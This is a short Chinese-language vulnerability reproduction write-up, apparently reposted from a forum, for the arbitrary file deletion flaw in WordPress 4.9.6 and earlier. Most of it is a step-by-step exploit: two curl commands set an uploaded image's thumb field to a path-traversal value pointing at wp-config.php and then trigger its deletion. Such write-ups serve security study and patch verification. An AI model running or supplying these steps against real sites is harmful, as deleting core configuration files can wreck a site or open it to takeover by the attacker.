# WordPress <= 4.9.6 任意文件删除漏洞 > 原文:[https://www.zhihuifly.com/t/topic/3261](https://www.zhihuifly.com/t/topic/3261)
# WordPress <= 4.9.6 任意文件删除漏洞 ## 一、漏洞简介 利用条件L:需要进入后台 ## 二、漏洞影响 ## 三、复现过程 ### 添加新媒体 访问http://0-sec.org/wp-admin/upload.php,然后上传图片。  ### 将$ meta ['thumb']设置为我们要删除的文件 #### 单击我们在中上传的图像Step 2,并记住图像的ID。  #### 访问http://0-sec.org/wp-admin/post.php?post=4&action=edit._wpnonce在页面源中查找  #### 发送有效载荷: ``` curl -v 'http://0-sec.org/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php' ```  ### 发动攻击 #### 在页面源码中查找 _wpnonce  #### 发送有效载荷 ``` curl -v 'http://9c9b.vsplate.me/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***' ```  #### 刷新页面 
请登录后查看评论内容